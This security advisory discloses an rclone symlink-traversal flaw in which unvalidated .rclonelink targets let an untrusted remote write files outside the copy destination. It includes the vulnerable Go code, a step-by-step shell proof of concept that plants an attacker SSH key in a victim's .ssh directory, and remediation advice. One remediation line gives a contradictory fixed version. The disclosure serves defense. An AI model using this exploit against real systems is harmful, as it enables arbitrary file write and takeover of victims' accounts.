GHSA-cf44-9pgv-m4xc: High severity go/github.com/rclone/rclone vulnerability
Summary With -l/--links, rclone serializes symlinks as <name>.rclonelink text objects whose body is the link target. When rclone writes such an object to a local destination, it recreates the symlink with os.Symlink(<object body>, <dest path>) and performs NO validation of the target. If the source is attacker-controlled, the attacker sets the body to any absolute or ../ path, so rclone plants a symlink inside the destination that points anywhere on the victim's filesystem. Because a sibling object named <name>.rclonelink sorts before <name>/..., rclone creates the escaping symlink first and then writes a following object "inside" it; mkdirAll/OpenFile follow the planted symlink, so the file lands OUTSIDE the destination with attacker-chosen contents. This yields arbitrary file write as the victim user, e.g. overwriting ~/.ssh/authorizedkeys, ~/.bashrc, or a crontab — i.e. code execution.
Details backend/local/local.go, Object.Update(): go } else { out = nopWriterCloser{&symlinkData} // body of <name>.rclonelink = attacker data } ... if o.translatedLink { if err == nil { if , err := os.Lstat(o.path); err == nil { os.Remove(o.path) } // Use the contents for the copied object to create a symlink err = os.Symlink(symlinkData.String(), o.path) // <-- target NEVER validated (abs / .. allowed) } } symlinkData is the raw body of the source object, fully attacker-controlled when copying from an untrusted remote. There is no check that the target is relative or stays within the destination. The subsequent write path (mkdirAll() → file.MkdirAll, then file.OpenFile(..., OCREATE)) follows existing symlink components with no ONOFOLLOW, so a file written under the planted symlinked directory escapes the destination.
PoC 1) Get the official stable binary: curl -fsSLO https://downloads.rclone.org/v1.74.3/rclone-v1.74.3-linux-amd64.zip unzip -j rclone-v1.74.3-linux-amd64.zip '/rclone' -d . # ./rclone -> v1.74.3 2) Create an attacker-controlled "remote" (two objects) and a victim layout: mkdir -p evil/pwn dest victimhome/.ssh printf '%s' "$PWD/victimhome/.ssh" > evil/pwn.rclonelink # body = abs path OUTSIDE dest printf 'ssh-ed25519 AAAAATTACKERKEY pwned\n' > evil/pwn/authorizedkeys ls -l victimhome/.ssh # empty (before) 3) Serve the malicious remote (models any untrusted remote — bucket / WebDAV / HTTP share): cd evil && python3 -m http.server 38080 --bind 127.0.0.1 4) VICTIM ACTION — back up the untrusted remote preserving symlinks: ./rclone copy --links --http-url http://127.0.0.1:38080 :http: ./dest -v 5) Observe — a file landed OUTSIDE ./dest: ls -l dest/pwn # dest/pwn -> .../victimhome/.ssh (symlink escapes dest) cat victimhome/.ssh/authorizedkeys # ssh-ed25519 AAAAATTACKERKEY pwned <-- written outside dest pwn.rclonelink sorts before pwn/authorizedkeys, so rclone creates the escaping symlink first and the next write follows it out of the destination. With rclone run as the victim user this overwrites ~/.ssh/authorizedkeys, ~/.bashrc, or a crontab → code execution.
Impact An attacker who controls the contents of any remote a victim syncs with -l/--links gains arbitrary file write as the victim user, anywhere that user can write. Overwriting ~/.ssh/authorizedkeys, shell rc files, or cron files yields remote code execution on the victim's host. Even without the write-through step, the destination is silently populated with symlinks pointing anywhere on the local filesystem (confinement break / later read-or-write traversal).
Remediation In Object.Update() reject symlink targets that are absolute or escape the destination root before calling os.Symlink (resolve filepath.Join(dir, target) and require it to stay within the configured root, or refuse absolute/.. targets), and write objects with ONOFOLLOW on the final component plus a no-symlink-in-parent check so a planted symlinked directory is never followed. Add a regression test copying a .rclonelink with target /tmp/... and a sibling file, asserting nothing is written outside the destination.
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
go/github.com/rclone/rcloneto a version that resolves this vulnerability.Fixed in 1.74.4 - Upgrade
Upgrade
./rcloneto a version that resolves this vulnerability.Fixed in v1.74.3 - Configuration
In Object.Update(), when handling symlink creation, validate the link target: resolve filepath.Join(dir, target) and refuse any absolute or path-escape (../) target that would escape the configured destination root before calling os.Symlink.
backend/local/local.go (Object.Update) symlink target validation = Reject symlink targets that are absolute or escape the destination root before calling os.Symlink (resolve filepath.Join(dir, target) and require it to stay within the configured root; refuse absolute/.. targets). - Configuration
Harden the subsequent write path (mkdirAll() -> file.MkdirAll, then file.OpenFile(...)) to avoid following symlink components: open/write the final component with O_NOFOLLOW and add a no-symlink-in-parent check so a planted symlinked directory is never followed before writing the object.
backend/local/local.go (write path) no-symlink-follow on final component = Use O_NOFOLLOW on the final component plus a no-symlink-in-parent check so planted symlinked directories are never followed. - Operational
Add a regression test: copy a .rclonelink with target /tmp/... and a sibling file, and assert that nothing is written outside the destination root.
Event History
Frequently Asked Questions
What is the severity of GHSA-cf44-9pgv-m4xc?
The severity of GHSA-cf44-9pgv-m4xc is assessed as high with a score of 7.5.
What are the risks associated with GHSA-cf44-9pgv-m4xc?
The risks include potential arbitrary symlink creation, which can lead to unauthorized access or data manipulation.
How do I fix GHSA-cf44-9pgv-m4xc?
To fix GHSA-cf44-9pgv-m4xc, ensure you upgrade to a patched version of rclone that includes validation for symlink targets.
What does GHSA-cf44-9pgv-m4xc affect?
GHSA-cf44-9pgv-m4xc affects rclone, specifically its handling of symlinks during the serialization process.
What is the impact of GHSA-cf44-9pgv-m4xc on system security?
The impact includes the potential for attackers to create malicious symlinks that could compromise system security and integrity.